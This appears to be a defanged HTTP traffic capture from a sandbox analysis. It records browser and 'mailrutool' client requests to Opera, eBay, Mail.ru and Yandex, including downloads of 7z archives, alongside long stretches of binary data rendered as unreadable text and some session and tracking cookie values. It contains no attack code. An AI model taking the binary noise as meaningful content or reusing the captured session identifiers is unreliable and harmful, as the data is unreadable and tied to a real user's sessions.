....W..7....=.......d.A..kT..v,.CG.#;...5.W5......gCnMp.R.bx...n..[...
...C....-.24lfP.!.....P......$.e.h.C.....;....-@...&}k.MB_.~..\.-.]..A
...IP.ew:T....t......M<...d...g;..A.my..@g. ..D{.X..i{-hn...a...h..
.c;...i.:|....a.(......'...E=C{$.|x =b:......0C....7.....:..L_.Q(..F..
..<L...W.........-...e.....#.t....Q~... ......ic.H.1.F.8.lw....3...
*....J....$H....4I.(m...|...|...o...K9.jIy!0......Q%.i..0... D.x.}?...
...F.S....\......VH.i.(..K..m.....$T.{..((ZC...s....u~.t..b..a,....%PI
r1.*... ..TY<>.JE....KBq.O`..s...kS..........").......y...~.0(.U
...........G...t...U.9u^._.Z.;.....*..Yy..7..$....R.).3t../.^....(...a
8Lg..t.X...v.X0....Y'.F."...,.:..Q.4....X....L3...D.E...d..U.....t..*.
.JY...}....}......r=..a..k..t.hE7....=.L>k.8.i..w8x..0.!..-..\.=U..
U.....B.e.*.F.Zh.pH....p.F....?....h...M D.[......."..0.W..q....O=<<< skipped >>>

GET /favicon.ico HTTP/1.1

Host: VVV.ebay.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Last-Modified: Mon, 29 Oct 2012 10:25:28 GMT

Cache-Control: public, max-age=5184000

Expires: Fri, 24 Apr 2015 09:31:42 GMT

Content-Type: image/x-icon

Content-Length: 1150

Date: Mon, 23 Feb 2015 09:31:42 GMT

Connection: keep-alive

............ .h.......(....... ..... .................................
......................................................................
......................................................................
............................................82..82..82..82...d...d...d
...d..................................82..82..82..82...d...d...d...d..
................................82..82..82..82...d...d...d...d........
..........................82..82..82..82...d...d...d...d..............
....................82..82..82..82...d...d...d...d....................
..............82..82..82..82...d...d...d...d..........................
........82..82..82..82...d...d...d...d................................
......................................................................
......................................................................
......................................................................
.......l...................o.......................................$..
.....i...........i.......$.......................................'....
...............'.......................P...P.......A..................
.................P...P........HTTP/1.1 200 OK..Server: Apache-Coyote/1
.1..Last-Modified: Mon, 29 Oct 2012 10:25:28 GMT..Cache-Control: publi
c, max-age=5184000..Expires: Fri, 24 Apr 2015 09:31:42 GMT..Content-Ty
pe: image/x-icon..Content-Length: 1150..Date: Mon, 23 Feb 2015 09:31:4
2 GMT..Connection: keep-alive.............. .h.......(....... ..... ..
..................................................................

<<< skipped >>>

GET /speeddials/partner/youtube HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/youtube_other/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601656

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/ebay_us/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "6453c2-1464-50ecea1134600"

Content-Type: image/png

Content-Length: 5220

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563544 2724545072

Age: 55

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 37
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:1951
2F4DBED211E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:19512F4CBED211
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:887021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>..!.....IDATx....p.U..].uuW.-..w.U.]...]...
.Cy..we..9.R..R..pEPn.A.... ......HB2I.}O........./.............W..=.z
2.|....}}.......#.P..(....P..(....P..(....P..(....P..(....P..(....P..(
....P..(....P..(....P..(.......(.......(.......(.......(.......(......
.(.........F.K.=gL...,..P...(.e.,..P...(.e.,..P...(.e.,..P...(.e.,..PV
....m6. k..vA...w..........aK;...V.._..?...W...W.....O..~.......,..? .
.>R..*D..g.W.YZ...r~....%W...g..A...vVFe.8^M.D..Q....bM|.;..%.Vs.U.
......,{o..|.z.i[.h{.....e.. pG.......L[A]..O...o..M05........,...<<< skipped >>>

GET /previews/images/booking_com_us/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "72519d-11cb-50ecea1134600"

Content-Type: image/png

Content-Length: 4555

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601705 2598567483

Age: 101

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 58
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:42B4
BA3FBED611E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:42B4BA3EBED611
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8C7021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.wc.....IDATx....TTW.....Xc...dw..l.lK....%
.U..]..%.u..A.......UQ..XQ.....R..%....O......SWa.?.w<.7......}...o
|..G..q ..[@.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,
!T..*K.,!T..*K.,..Be....PYBe....PYBe....PYBe....PYBe....PYBe....PYBe..
..PYBe....PYBe....PYBe....PYB.,...PYB.,...PYB.,....?k..Aw.......v....`
..E".|.>w.......... .....J....o1....6.0c..;w.>x..Pn.?.L.1..l?.9.
n.y`.v..E...?l.^.^ja.E..v./.2..=....-.1..lN....nG......R.,n.Z../\.Wz-.
..P.g.....WU.....l.~!v.D.l.. B.I.I...Qv......A....sNK...\.p.....KW<<< skipped >>>

GET /?from=dist_svz HTTP/1.1

Host: mail.yandex.ua

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: text/html

Content-Length: 154

Connection: keep-alive

Location: hXXps://mail.yandex.ua/?from=dist_svz
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>..HTTP/1.1 302 Moved Temporarily..Serv
er: nginx..Date: Mon, 23 Feb 2015 09:35:34 GMT..Content-Type: text/htm
l..Content-Length: 154..Connection: keep-alive..Location: hXXps://mail
.yandex.ua/?from=dist_svz..<html>..<head><title>302 
Found</title></head>..<body bgcolor="white">..<ce
nter><h1>302 Found</h1></center>..<hr><c
enter>nginx</center>..</body>..</html>....
..

GET /V13a***R>*mail_ru/ru/UTF-8/tmsec=mail_go/93282204 HTTP/1.1

Host: VVV.tns-counter.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Moved Temporarily

Server: tns-counter-1.1.0/1.6.2

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/gif

Content-Length: 0

Location: hXXp://VVV.tns-counter.ru/V13b***R>*mail_ru/ru/UTF-8/tmsec=mail_go/93282204

Connection: close

Set-Cookie: guid=5E45131954EAF466X1424684134; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate

GET /update?rnd=994264022237&p=gomail2&t=gomail_main&v=1958 HTTP/1.1

Host: gomail.radar.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:35 GMT

Server: imagine/radar (5115861e)

Connection: close

X-Content-Type-Options: nosniff

Content-Length: 43

Content-Type: image/gif

GIF89a.............!.......,...........L..;..

GET /go_chxtn4.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Accept: */*

Range: bytes=0-31291

User-Agent: mailrutool

Connection: close


HTTP/1.1 206 Partial Content

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 31291

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-7a3b"

Content-Range: bytes 0-31290/31291
7z..'........y......$............D...z'.....P.....P>9.YL.C...P.J...
.x.[...c.(VU...Q....R.],....... ..n,..WG...QV./..,..Va.........o. .d.0
...x.\.7..j...........?.L.@......g.........0/a.pp....d.j.XU.....l.Ks..
rU....EbK......2.~....... ..._..;../.@.-8t.....$..^wC..D...2y.2{yI...!
.P..B.l<.9....a.*].={3(....... ..iP. .z.n4..#..9r./......b92!). Iad
.t5.......2.W...X.].X..57...O~;k.......b.ZB..;.\9./......sP*(J Q..T...
V.ely#T.*."..P.....2.U.y.u...W:83<...a....Rt.<s\r...)#.....H!..^
...!......n.%VA..,...E=..W<..8 .b=.....y.E..o......R..Z.c9.r~}.}.-.
........R...$q...%..sUA...!...Usou}?x.rc.F":..!..y!...Rh......D[...M.|
.E.o.I... '......g.Q..J.^k...t..........m......).".M..2..tHz....z.....
.R.!...5./*3vy......n.......D..........#.............W6JG^.U..mI......
..g'. .F.......FZ........T..wVG....O.>x.?&.ZT...xskb.%.m.U..A...`..
...z..s@._....ng.D...LAr..r.z...}.3/a..h....h.^..1..a..p.....N......s.
...34.....^...^hTf.$4..u_.sd....{xq`.*%.9}.:..e.TLE...zv......\..t....
.i......@9...}.P...=..f......}....6. .C....B..8.....F..8.L..&.<N..b
..;.p.....}.x.?R..sZZw.|..............4...k..>.QFD..%..bD.]...Y"...
H .~.46...'.B.'z0f..#....G...>n....M..h............(...K..deR...8..
2.i..>.O...H.N..4.....&&..XVI.1P.E.[.q.. ..9FG...&...K..W..m.|.".A.
.........._.k........rjQv..0...'c../...w..........Pp.Q.j...}&...vq.o..
...FY..;.......ycK..........p...Zn`.y4.u'...O...np....V.l...z..S?E..e.
3..z?....CM.~ 9...>Z...YS.y.X.7#....\......?.`. T%.@...o.......\.r.
...^...O..8.O.......fJQ......R....Y.R.$............:,@9.G&..@:..G.<<< skipped >>>

GET /go_chhp11956636.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Accept: */*

Range: bytes=0-30942

User-Agent: mailrutool

Connection: close


HTTP/1.1 206 Partial Content

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 30942

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-78de"

Content-Range: bytes 0-30941/30942
7z..'........x......$........O...D...z'.....P.....P>9.YL.C...P.J...
.x.[...c.(VU...Q....R.],....... ..n,..WG...QV./..,..Va.........o. .d.0
...x.\.7..j...........?.L.@......g.........0/a.pp....d.j.XU.....l.Ks..
rU....EbK......2.~....... ..._..;../.@.-8t.....$..^wC..D...2y.2{yI...!
.P..B.l<.9....a.*].={3(....... ..iP. .z.n4..#..9r./......b92!). Iad
.t5.......2.W...X.].X..57...O~;k.......b.ZB..;.\9./......sP*(J Q..T...
V.ely#T.*."..P.....2.U.y.u...W:83<...a....Rt.<s\r...)#.....H!..^
...!......n.%VA..,...E=..W<..8 .b=.....y.E..o......R..Z.c9.r~}.}.-.
........R...$q...%..sUA...!...Usou}?x.rc.F":..!..y!...Rh......D[...M.|
.E.o.I... '......g.Q..J.^k...t..........m......).".M..2..tHz....z.....
.R.!...5./*3vy......n.......D..........#.............W6JG^.U..mI......
..g'. .F.......FZ........T..wVG....O.>x.?&.ZT...xskb.%.m.U..A...`..
...z..s@._....ng.D...LAr..r.z...}.3/a..h....h.^..1..a..p.....N......s.
...34.....^...^hTf.$4..u_.sd....{xq`.*%.9}.:..e.TLE...zv......\..t....
.i......@9...}.P...=..f......}....6. .C....B..8.....F..8.L..&.<N..b
..;.p.....}.x.?R..sZZw.|..............4...k..>.QFD..%..bD.]...Y"...
H .~.46...'.B.'z0f..#....G...>n....M..h............(...K..deR...8..
2.i..>.O...H.N..4.....&&..XVI.1P.E.[.q.. ..9FG...&...K..W..m.|.".A.
.........._.k........rjQv..0...'c../...w..........Pp.Q.j...}&...vq.o..
...FY..;.......ycK..........p...Zn`.y4.u'...O...np....V.l...z..S?E..e.
3..z?....CM.~ 9...>Z...YS.y.X.7#....\......?.`. T%.@...o.......\.r.
...^...O..8.O.......fJQ......R....Y.R.$............:,@9.G&..@:..G.<<< skipped >>>

GET /?osd=1 HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:31 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: sid=3448fb69b0bbe5ca665d0542c67ca40d; Domain=go.mail.ru; Path=/

Content-Security-Policy: default-src rutube.ru *.mail.ru hXXps://*.mail.ru *.imgsmail.ru *.youtube.com *.youtube.ru *.youtu.be *.googlevideo.com *.ytimg.com hXXps://*.ytimg.com *.rutube.ru *.vimeo.com *.smotri.com *.dailymotion.com *.rambler.ru *.ivi.ru *.digitalaccess.ru *.videomore.ru *.weborama.fr *.adriver.ru *.addthis.com *.yandex.net *.yandex.ru *.newstube.ru newstube.ru *.spruto.tv *.bigmir.net bm.img.com.ua *.tvzavr.ru *.meta.ua *.tvmir.ru tvmir.ru *.mycdn.me ok.ru *.ok.ru odnoklassniki.ru *.odnoklassniki.ru vk.com *.vk.com *.mradx.net 2gis.com *.2gis.com 2gis.ru *.2gis.ru; script-src 'unsafe-inline' 'unsafe-eval' *.mail.ru hXXps://*.mail.ru *.imgsmail.ru hXXps://*.imgsmail.ru ok.ru *.ok.ru *.yandex.ru *.odnoklassniki.ru *.youtube.com *.dailymotion.com *.vimeo.com *.addthis.com *.affiliatesearch.ru affiliatesearch.ru 2gis.com *.2gis.com 2gis.ru *.2gis.ru; img-src *; style-src 'unsafe-inline' *.mail.ru *.imgsmail.ru *.yandex.net *.addthis.com 2gis.com *.2gis.com 2gis.ru *.2gis.ru; font-src data: *.mail.ru *.imgsmail.ru; report-uri hXXp://go.mail.ru/csp-report;

Content-Encoding: gzip
44f.............V.n.F.>.O.....bl......E@.&.!3@.....RZ..].d..8N[.(`.
...^z..5lTq\...W..t......6...V.3.|..C..O.U.....J.) .....}n.z.....L....
.5dm.}Os).T.vh........<|...l.R.e........8T..p...|......j...g....M  
........=.....).......{...{....A..A..J.W,...J....Ze...K.e..v...IC.I[.V
.%...I....l4.$`*t..4.y...U....]..@...u...}.-.2.... Mh.)pJ...4.j.V..l.b
..?...,..T{^....P....3C...fu@.O.Vr..$R.{/.`.....4..MR.6>.x...U.%...
.....s......<..2... p...%.5T../.\.B~P..G<f.1.\_...r..Y.v}kc....5
.$...?..2...2....h.../.[..r'.......vr.. \H..h.Do...{.]./.....,......*x
0.6.F..Q.F..F......)...........t:>........{..........^....H..0....(
u.&.z.~G.............S..........u..o.........X..<...4..".H.30...\..
.5.. py.'....a-F ;.2...*W.W...w.b.I..H..$.-X.iLo.>...Yl....6o.UIq..
.......MV..8C....&}.O5...4b ...y...w....:...Jw.Y.$....'=...!..(!z....$
..*.u......H ..tB,E.'.......\......?..a''z.#.Jfll>.X.....C[.!.Q..&g
t;U.......<.....zc.R....OQND3.0.B....]..8e=......y.N.{L.'......8w..
..,...Q.o2...m.%....j..d..... (C..>ic}n.P...'..:...*...Y..j..E.9...
<.i,.\..;.%X.s.a2..]....{.iR...'..._..........{D.4..e].'z.I... }0.&
1..D....1ar.)..C.............6c2...Yms.F..,..C.$..%;..8.|...L;..o..(..
(Q$.......<{....3...ioo.woW)..a....0.U~3V.UF...\.E.@.<`g.....:.Z
1.....P.8 ...._k~....2...41..Pq......R.T..z...r*H...h..iv?Vo...J}...U*
].r=.`[...*OU......WQI.]....n.X..g.(...8]d.>@........i.\.6t....}v_E
D. :.G53..w.....e....W-.......g..'].... .5...6.'~.!Z.r/..,........Xi..
..z.Wks.......vip.X).jY.()..B$....t.}5.zt........%..1Q..V...,Br...<<< skipped >>>

GET /static/common/img/favicon.ico HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:31 GMT

Content-Type: image/x-icon

Content-Length: 5430

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:31 GMT

Cache-Control: max-age=864000

X-Frame-Options: SAMEORIGIN

Accept-Ranges: bytes

............ .h...&...  .... .........(....... ..... .................
...........J..........................................................
.J.............................................{...i...n..............
.....................................y...m............................
.......s...c...Z...Z...c...h...i...................................l..
..V...................a..................................s............
....................................................U...........v.....
......v...........a...................................w...............
....~.................................................................
.........................................t...................t........
....................................v..j...x...x...j....}.............
......................V...........u..a...`....u...........W...........
......................................................................
..................W...................V...............................
.............................................................I........
...................................................I..................
..............................................(... ...@..... .........
.......................'..............................................
.....................................................................'
kB.....(..............................................................
.............................................................(........
..................................................................

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR0JBRnBp/14Jg/Xj4aa6BlKlQVdQQUAVmr5906C1mmZGPWzyAHV9WR52oCEBrIXreuw1E82A2FOF7P0gg= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: sr.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1595

content-transfer-encoding: binary

Cache-Control: max-age=490771, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 01:47:51 GMT

Expires: Sun, 1 Mar 2015 01:47:51 GMT

Date: Mon, 23 Feb 2015 09:31:45 GMT

Connection: keep-alive
0..7......00..,.. .....0......0...0............uq....N.)MJ.....2015022
2014751Z0s0q0I0... ........t$.g.....?^>.k.e*T.u...Y...:.Y.dc.. .W..
.j....^...Q<...8^.......20150222014751Z....20150301014751Z0...*.H..
...........Bb.....<o.R...........B...7.......>&.{...d.;...x..F..
D..odL_1....c...#XULE......v@E./#BcJ.....P)...v..I..#....t)....(i.fj..
.T...t..fEk...7.....)......E].!.y%X.r%3.>........M...].i......j.'X.
.YT...g...?:. .....cE.d.{.?(.wp.Cf2k....p...(....3.....!.!...;.......`
0..\0..X0..@.............G@r./"..."0...*.H........0w1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1(0&..U....
Symantec Class 3 EV SSL CA - G30...150119000000Z..150419235959Z091705.
.U....Symantec Class 3 EV SSL CA - G3 OCSP Responder0.."0...*.H.......
......0.........7....`.rsr..o.../.C.......ILf.l..%..8......I7G.7..uG..
KN..5........"q.g..-..y..e...Y..%Q%...}..Wq..3x;......|.........l...z.
P=3R8@G.vU.}...X-HB..=W.."w.......O..W.t.zj.8...D...G.....)..q..1.S...
,n.2...^..-....=!;2.X;.VY.Z.........G$..%5....fD.R.........h..........
0...0... .....0......0"..U....0...0.1.0...U....TGV-B-28640...U.#..0...
.Y...:.Y.dc.. .W...j0...U............uq....N.)MJ...0...U.......0.0n..U
. .g0e0c..`.H...E....0T0&.. .........hXXp://VVV.symauth.com/cps0*.. ..
.....0...  hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U.......
....0...*.H.............c....i..83..K@.nP.Ub..1...$..oY.Um.tE.%Ai2V..U
.0.i.K.-.P.^$d,!y..e.....f]..:g......lJ...........~e.`.E..v...../..xm=
%1.n... Y. ..'..yH`..]...G.%..4,.*.........26.....m....,W(.y.x.!..<<< skipped >>>

GET /count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04agcEPWEcG8e1gW6bbHmwaRpGIMG6auKDGQxswDfur72lu0In0RlhwnEnLdlHL7W8 HTTP/1.1

Host: bs.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: text/html

Content-Length: 154

Connection: keep-alive

Location: hXXp://bs.yandex.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,,1961059298
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>..HTTP/1.1 302 Moved Temporarily..Serv
er: nginx..Date: Mon, 23 Feb 2015 09:35:34 GMT..Content-Type: text/htm
l..Content-Length: 154..Connection: keep-alive..Location: hXXp://bs.ya
ndex.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6y
q4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,,1961059298..&
lt;html>..<head><title>302 Found</title></head
>..<body bgcolor="white">..<center><h1>302 Found&
lt;/h1></center>..<hr><center>nginx</center>
;..</body>..</html>......


GET /count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,2579112161391436322,3896980131 HTTP/1.1

Host: bs.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: mrcu=E8FE54EAF466748E05E0E7F48AC1; VID=3u5u4k1KJ3nJ00000102141J:


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:35 GMT

Content-Type: image/gif

Connection: keep-alive

Set-Cookie: searchuid=2579112161391436322; domain=.mail.ru; path=/; expires=Thu, 20-Feb-2025 09:35:35 GMT

Content-Length: 43
GIF89a.............!.......,...........D..;.HTTP/1.1 200 OK..Server: n
ginx..Date: Mon, 23 Feb 2015 09:35:35 GMT..Content-Type: image/gif..Co
nnection: keep-alive..Set-Cookie: searchuid=2579112161391436322; domai
n=.mail.ru; path=/; expires=Thu, 20-Feb-2025 09:35:35 GMT..Content-Len
gth: 43..GIF89a.............!.......,...........D..;...

GET /speeddials/partner/yandex_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/yandex_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644828

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /speeddials/partner/product_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/product_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598682986

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/megogo_net_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "7e4df3-ef5b-50ecea1134600"

Content-Type: image/png

Content-Length: 61275

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598683004 2598586324

Age: 280

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 56
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
